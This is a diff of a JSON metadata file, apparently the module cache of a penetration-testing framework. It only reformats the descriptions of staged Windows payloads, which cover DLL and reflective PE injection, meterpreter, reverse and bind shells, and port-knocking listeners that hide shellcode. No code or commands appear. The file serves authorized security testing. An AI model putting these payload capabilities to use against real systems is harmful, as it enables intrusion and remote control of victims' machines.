-    "description": "Inject a custom DLL into the exploited process. Connect back to the attacker over IPv6",
+    "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker over IPv6",
    "references": [

    ],
@@ -200732,7 +201578,7 @@
      "skape <mmiller@hick.org>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Inject a custom DLL into the exploited process. Connect back to the attacker (No NX)",
+    "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker (No NX)",
    "references": [

    ],
@@ -200768,7 +201614,7 @@
      "skape <mmiller@hick.org>",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Inject a custom DLL into the exploited process. Connect back to the attacker",
+    "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -200805,7 +201651,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a custom DLL into the exploited process. Connect back to the attacker",
+    "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -200842,7 +201688,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a custom DLL into the exploited process. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Inject a custom DLL into the exploited process.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [

    ],
@@ -200880,7 +201726,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "RageLtMan"
    ],
-    "description": "Inject a custom DLL into the exploited process. Connect back to the attacker",
+    "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -200919,7 +201765,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject a custom DLL into the exploited process. Connect back to the attacker",
+    "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -200958,7 +201804,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject a custom DLL into the exploited process. Connect back to the attacker",
+    "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -200995,7 +201841,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Inject a custom DLL into the exploited process. Connect back to the attacker with UUID Support",
+    "description": "Inject a custom DLL into the exploited process.\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -201033,7 +201879,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [

    ],
@@ -201071,7 +201917,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [

    ],
@@ -201108,7 +201954,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Listen for an IPv6 connection (Windows x86)",
+    "description": "Inject the meterpreter server DLL (staged).\n\nListen for an IPv6 connection (Windows x86)",
    "references": [

    ],
@@ -201146,7 +201992,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Inject the meterpreter server DLL (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -201182,7 +202028,7 @@
      "jt <jt@klake.org>",
      "UserExistsError"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Listen for a pipe connection (Windows x86)",
+    "description": "Inject the meterpreter server DLL (staged).\n\nListen for a pipe connection (Windows x86)",
    "references": [

    ],
@@ -201218,7 +202064,7 @@
      "jt <jt@klake.org>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Listen for a connection (No NX)",
+    "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection (No NX)",
    "references": [

    ],
@@ -201255,7 +202101,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Listen for a connection (Windows x86)",
+    "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection (Windows x86)",
    "references": [

    ],
@@ -201294,7 +202140,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Listen for a connection",
+    "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -201331,7 +202177,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Listen for a connection with UUID Support (Windows x86)",
+    "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -201366,7 +202212,7 @@
      "skape <mmiller@hick.org>",
      "jt <jt@klake.org>"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Use an established connection",
+    "description": "Inject the meterpreter server DLL (staged).\n\nUse an established connection",
    "references": [

    ],
@@ -201403,7 +202249,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Connect back to the attacker over IPv6",
+    "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker over IPv6",
    "references": [

    ],
@@ -201439,7 +202285,7 @@
      "jt <jt@klake.org>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Connect back to the attacker (No NX)",
+    "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker (No NX)",
    "references": [

    ],
@@ -201475,7 +202321,7 @@
      "jt <jt@klake.org>",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Connect back to the attacker",
+    "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -201512,7 +202358,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Connect back to the attacker",
+    "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -201549,7 +202395,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Inject the meterpreter server DLL (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [

    ],
@@ -201587,7 +202433,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "RageLtMan"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Connect back to the attacker",
+    "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -201626,7 +202472,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Connect back to the attacker",
+    "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -201665,7 +202511,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Connect back to the attacker",
+    "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -201702,7 +202548,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Inject the meterpreter server DLL (staged). Connect back to the attacker with UUID Support",
+    "description": "Inject the meterpreter server DLL (staged).\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -201740,7 +202586,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
    "references": [

    ],
@@ -201778,7 +202624,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [

    ],
@@ -201815,7 +202661,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for an IPv6 connection (Windows x86)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection (Windows x86)",
    "references": [

    ],
@@ -201853,7 +202699,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -201888,7 +202734,7 @@
      "ege <egebalci@pm.me>",
      "UserExistsError"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a pipe connection (Windows x86)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a pipe connection (Windows x86)",
    "references": [

    ],
@@ -201923,7 +202769,7 @@
      "ege <egebalci@pm.me>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a connection (No NX)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection (No NX)",
    "references": [

    ],
@@ -201960,7 +202806,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a connection (Windows x86)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection (Windows x86)",
    "references": [

    ],
@@ -201999,7 +202845,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a connection",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection",
    "references": [

    ],
@@ -202035,7 +202881,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a connection with UUID Support (Windows x86)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -202070,7 +202916,7 @@
      "ege <egebalci@pm.me>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Use an established connection",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nUse an established connection",
    "references": [

    ],
@@ -202107,7 +202953,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker over IPv6",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker over IPv6",
    "references": [

    ],
@@ -202142,7 +202988,7 @@
      "ege <egebalci@pm.me>",
      "OJ Reeves"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker via a named pipe pivot",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker via a named pipe pivot",
    "references": [

    ],
@@ -202177,7 +203023,7 @@
      "ege <egebalci@pm.me>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker (No NX)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker (No NX)",
    "references": [

    ],
@@ -202212,7 +203058,7 @@
      "ege <egebalci@pm.me>",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
    "references": [

    ],
@@ -202249,7 +203095,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
    "references": [

    ],
@@ -202286,7 +203132,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [

    ],
@@ -202324,7 +203170,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "RageLtMan"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
    "references": [

    ],
@@ -202363,7 +203209,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
    "references": [

    ],
@@ -202402,7 +203248,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
    "references": [

    ],
@@ -202438,7 +203284,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker with UUID Support",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -202655,7 +203501,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Spawn a piped command shell (staged). Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Spawn a piped command shell (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [

    ],
@@ -202693,7 +203539,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Spawn a piped command shell (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Spawn a piped command shell (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [

    ],
@@ -202730,7 +203576,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Spawn a piped command shell (staged). Listen for an IPv6 connection (Windows x86)",
+    "description": "Spawn a piped command shell (staged).\n\nListen for an IPv6 connection (Windows x86)",
    "references": [

    ],
@@ -202768,7 +203614,7 @@
      "skape <mmiller@hick.org>",
      "OJ Reeves"
    ],
-    "description": "Spawn a piped command shell (staged). Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Spawn a piped command shell (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -202804,7 +203650,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "UserExistsError"
    ],
-    "description": "Spawn a piped command shell (staged). Listen for a pipe connection (Windows x86)",
+    "description": "Spawn a piped command shell (staged).\n\nListen for a pipe connection (Windows x86)",
    "references": [

    ],
@@ -202840,7 +203686,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Spawn a piped command shell (staged). Listen for a connection (No NX)",
+    "description": "Spawn a piped command shell (staged).\n\nListen for a connection (No NX)",
    "references": [

    ],
@@ -202877,7 +203723,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Spawn a piped command shell (staged). Listen for a connection (Windows x86)",
+    "description": "Spawn a piped command shell (staged).\n\nListen for a connection (Windows x86)",
    "references": [

    ],
@@ -202916,7 +203762,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Spawn a piped command shell (staged). Listen for a connection",
+    "description": "Spawn a piped command shell (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -202953,7 +203799,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Spawn a piped command shell (staged). Listen for a connection with UUID Support (Windows x86)",
+    "description": "Spawn a piped command shell (staged).\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -202989,7 +203835,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Spawn a piped command shell (staged). Use an established connection",
+    "description": "Spawn a piped command shell (staged).\n\nUse an established connection",
    "references": [

    ],
